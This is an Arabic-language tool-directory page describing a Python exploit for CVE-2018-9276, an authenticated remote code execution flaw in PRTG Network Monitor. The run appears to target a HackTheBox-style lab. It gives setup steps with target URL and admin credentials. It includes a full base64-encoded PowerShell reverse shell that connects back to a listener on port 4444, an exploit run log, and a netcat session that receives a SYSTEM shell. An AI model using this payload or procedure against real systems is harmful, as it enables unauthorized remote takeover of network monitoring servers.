Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PRTG-Network-Monitor-18.2.38---Authenticated-Remote-Code-Execution-CVE-2018-9276 — استغلال Python لـ CVE: 2018-9276 | Kitploit
أدوات/GitHubGitHub/ac8999/prtg-network-monitor-18.2.38---authenticated-remote-code-execution-cve-2018-9276
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubac8999/prtg-network-monitor-18.2.38---authenticated-remote-code-execution-cve-2018-9276

PRTG-Network-Monitor-18.2.38---Authenticated-Remote-Code-Execution-CVE-2018-9276

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Python لـ CVE: 2018-9276

عرض المستودع
منذ 4 أشهرلم تتم المراجعة بعد

تنفيذ تعليمات برمجية عن بعد لمُراقب شبكة PRTG الموثَّق مبني على https://www.exploit-db.com/exploits/46527

الاستخدام: قم بتعديل النص يدويًا لتضمين عنوان URL المستهدف، واسم المستخدم وكلمة المرور للمسؤول كالتالي:

root@kitploit:~
TARGET = "http://10.129.15.52"
USER = "prtgadmin"
PASS = "PrTg@dmin2019"

ثم أدخل أي أمر ترغب في تنفيذه في السطر 110. أوصي بوضع شيل عكسي مشفر بـ base64 من revshells.com للاتصال الفوري بجهاز الاستماع الخاص بك.

ملاحظة: لقد تركت متغير CMD فارغًا في النص لتتمكن من تخصيصه كما تشاء.

root@kitploit:~
CMD = "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA1AC4AOQAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

ما عليك سوى تنفيذ النص بدون أي خيارات وستتلقى اتصالًا من جهاز الاستماع الخاص بك.

root@kitploit:~
┌──(root㉿user)-[/run/…/user/2024/HTBox/jerry]
└─# python3 CVE-2018-9276.py
[*] Attempting login as: prtgadmin
[+] Successfully logged in    
[*] Creating malicious notification...      
[+] Notification created. ID: 2019
[*] Triggering notification test...
[+] Payload queued successfully.
[*] Deleting notification 2019...
[+] Cleanup complete.
[*] Exploit cycle finished. Check target.


┌──(root㉿user)-[/home/user]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.93] from (UNKNOWN) [10.129.15.52] 50466
whoami
nt authority\system
PS C:\Windows\system32> 

لاحظت أنه لا يوجد نص بايثون لهذا الاستغلال، لذا اعتقدت أنه سيكون من الجيد تجميعه.

تنزيل الأداة